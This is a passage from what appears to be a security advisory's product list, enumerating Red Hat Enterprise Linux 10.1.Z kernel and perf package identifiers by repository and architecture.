"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
